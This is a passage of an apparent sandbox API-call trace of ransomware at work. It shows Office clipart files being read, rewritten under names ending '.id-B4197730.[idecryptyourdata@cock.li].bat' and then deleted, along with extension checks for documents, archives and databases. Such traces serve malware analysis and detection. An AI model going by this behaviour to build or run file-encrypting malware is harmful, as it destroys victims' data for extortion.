hFile=0x36c, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5754, lpOverlapped=0x0) returned 1 [0069.756] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5760, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5760, lpOverlapped=0x0) returned 1 [0069.758] ReadFile (in: hFile=0x36c, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.758] WriteFile (in: hFile=0x308, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.758] SetEndOfFile (hFile=0x308) returned 1 [0069.758] CloseHandle (hObject=0x308) returned 1 [0069.758] SetFilePointerEx (in: hFile=0x36c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.758] SetEndOfFile (hFile=0x36c) returned 1 [0069.759] CloseHandle (hObject=0x36c) returned 1 [0069.759] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.759] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099163.wmf")) returned 1 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString=".doc") returned 4 [0069.760] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString=".docx") returned 5 [0069.760] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0069.760] lstrlenW (lpString=".pdf") returned 4 [0069.760] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString=".xls") returned 4 [0069.760] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.760] lstrlenW (lpString=".xlsx") returned 5 [0069.760] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0069.760] lstrlenW (lpString=".ppt") returned 4 [0069.760] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString=".zip") returned 4 [0069.760] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.760] lstrlenW (lpString=".rar") returned 4 [0069.760] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString=".bz2") returned 4 [0069.760] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString=".7z") returned 3 [0069.760] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString=".dbf") returned 4 [0069.760] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString=".1cd") returned 4 [0069.760] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.760] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099163.WMF") returned 68 [0069.760] lstrlenW (lpString=".jpg") returned 4 [0069.760] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.766] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.766] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.766] GetLastError () returned 0x0 [0069.766] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x5ee4, lpOverlapped=0x0) returned 1 [0069.775] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5ef0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5ef0, lpOverlapped=0x0) returned 1 [0069.775] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.776] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.776] SetEndOfFile (hFile=0x370) returned 1 [0069.776] CloseHandle (hObject=0x370) returned 1 [0069.776] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.776] SetEndOfFile (hFile=0x340) returned 1 [0069.777] CloseHandle (hObject=0x340) returned 1 [0069.777] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.777] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099170.wmf")) returned 1 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString=".doc") returned 4 [0069.778] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString=".docx") returned 5 [0069.778] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0069.778] lstrlenW (lpString=".pdf") returned 4 [0069.778] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString=".xls") returned 4 [0069.778] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.778] lstrlenW (lpString=".xlsx") returned 5 [0069.778] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0069.778] lstrlenW (lpString=".ppt") returned 4 [0069.778] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString=".zip") returned 4 [0069.778] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.778] lstrlenW (lpString=".rar") returned 4 [0069.778] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString=".bz2") returned 4 [0069.778] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString=".7z") returned 3 [0069.778] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString=".dbf") returned 4 [0069.778] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString=".1cd") returned 4 [0069.778] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099170.WMF") returned 68 [0069.778] lstrlenW (lpString=".jpg") returned 4 [0069.778] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.779] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.779] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0069.780] GetLastError () returned 0x0 [0069.780] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x9114, lpOverlapped=0x0) returned 1 [0069.794] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x9120, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x9120, lpOverlapped=0x0) returned 1 [0069.795] ReadFile (in: hFile=0x340, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.795] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.796] SetEndOfFile (hFile=0x370) returned 1 [0069.796] CloseHandle (hObject=0x370) returned 1 [0069.796] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.796] SetEndOfFile (hFile=0x340) returned 1 [0069.797] CloseHandle (hObject=0x340) returned 1 [0069.797] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.797] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099173.wmf")) returned 1 [0069.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.799] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.799] lstrlenW (lpString=".doc") returned 4 [0069.799] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.799] lstrlenW (lpString=".docx") returned 5 [0069.799] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0069.799] lstrlenW (lpString=".pdf") returned 4 [0069.799] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.799] lstrlenW (lpString=".xls") returned 4 [0069.799] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.799] lstrlenW (lpString=".xlsx") returned 5 [0069.799] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0069.799] lstrlenW (lpString=".ppt") returned 4 [0069.800] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.800] lstrlenW (lpString=".zip") returned 4 [0069.800] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.800] lstrlenW (lpString=".rar") returned 4 [0069.800] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.800] lstrlenW (lpString=".bz2") returned 4 [0069.800] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.800] lstrlenW (lpString=".7z") returned 3 [0069.800] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.800] lstrlenW (lpString=".dbf") returned 4 [0069.800] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.800] lstrlenW (lpString=".1cd") returned 4 [0069.800] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.800] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099173.WMF") returned 68 [0069.800] lstrlenW (lpString=".jpg") returned 4 [0069.800] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.804] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.804] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.804] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.809] GetLastError () returned 0x0 [0069.809] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x9b8, lpOverlapped=0x0) returned 1 [0069.813] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x9c0, lpOverlapped=0x0) returned 1 [0069.814] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.814] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.814] SetEndOfFile (hFile=0x36c) returned 1 [0069.827] CloseHandle (hObject=0x36c) returned 1 [0069.827] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.827] SetEndOfFile (hFile=0x370) returned 1 [0069.828] CloseHandle (hObject=0x370) returned 1 [0069.828] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.828] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099176.wmf")) returned 1 [0069.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.828] lstrlenW (lpString=".doc") returned 4 [0069.828] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.828] lstrlenW (lpString=".docx") returned 5 [0069.828] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1 [0069.829] lstrlenW (lpString=".pdf") returned 4 [0069.829] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString=".xls") returned 4 [0069.829] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.829] lstrlenW (lpString=".xlsx") returned 5 [0069.829] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1 [0069.829] lstrlenW (lpString=".ppt") returned 4 [0069.829] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.829] lstrlenW (lpString=".zip") returned 4 [0069.829] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.829] lstrlenW (lpString=".rar") returned 4 [0069.829] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString=".bz2") returned 4 [0069.829] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString=".7z") returned 3 [0069.829] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.829] lstrlenW (lpString=".dbf") returned 4 [0069.829] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.829] lstrlenW (lpString=".1cd") returned 4 [0069.829] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099176.WMF") returned 68 [0069.829] lstrlenW (lpString=".jpg") returned 4 [0069.829] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.829] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.830] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.830] GetLastError () returned 0x0 [0069.830] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd42, lpOverlapped=0x0) returned 1 [0069.849] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd50, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd50, lpOverlapped=0x0) returned 1 [0069.849] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.849] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.849] SetEndOfFile (hFile=0x36c) returned 1 [0069.850] CloseHandle (hObject=0x36c) returned 1 [0069.850] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.850] SetEndOfFile (hFile=0x370) returned 1 [0069.852] CloseHandle (hObject=0x370) returned 1 [0069.852] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.852] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099180.wmf")) returned 1 [0069.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.852] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.852] lstrlenW (lpString=".doc") returned 4 [0069.852] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.852] lstrlenW (lpString=".docx") returned 5 [0069.852] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0069.852] lstrlenW (lpString=".pdf") returned 4 [0069.853] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString=".xls") returned 4 [0069.853] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.853] lstrlenW (lpString=".xlsx") returned 5 [0069.853] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0069.853] lstrlenW (lpString=".ppt") returned 4 [0069.853] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.853] lstrlenW (lpString=".zip") returned 4 [0069.853] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.853] lstrlenW (lpString=".rar") returned 4 [0069.853] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString=".bz2") returned 4 [0069.853] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString=".7z") returned 3 [0069.853] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.853] lstrlenW (lpString=".dbf") returned 4 [0069.853] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.853] lstrlenW (lpString=".1cd") returned 4 [0069.853] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.853] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099180.WMF") returned 68 [0069.853] lstrlenW (lpString=".jpg") returned 4 [0069.853] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.853] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.853] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0069.854] GetLastError () returned 0x0 [0069.854] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1016, lpOverlapped=0x0) returned 1 [0069.862] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1020, lpOverlapped=0x0) returned 1 [0069.863] ReadFile (in: hFile=0x370, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0069.863] WriteFile (in: hFile=0x36c, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0069.863] SetEndOfFile (hFile=0x36c) returned 1 [0069.866] CloseHandle (hObject=0x36c) returned 1 [0069.866] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.866] SetEndOfFile (hFile=0x370) returned 1 [0069.869] CloseHandle (hObject=0x370) returned 1 [0069.869] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.869] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099184.wmf")) returned 1 [0069.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.870] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099184.WMF") returned 68 [0069.870] lstrlenW (lpString=".doc") returned 4 [0069.870] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.870] lstrlenW (lpString=".docx") returned 5 [0069.870] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0069.870] lstrlenW 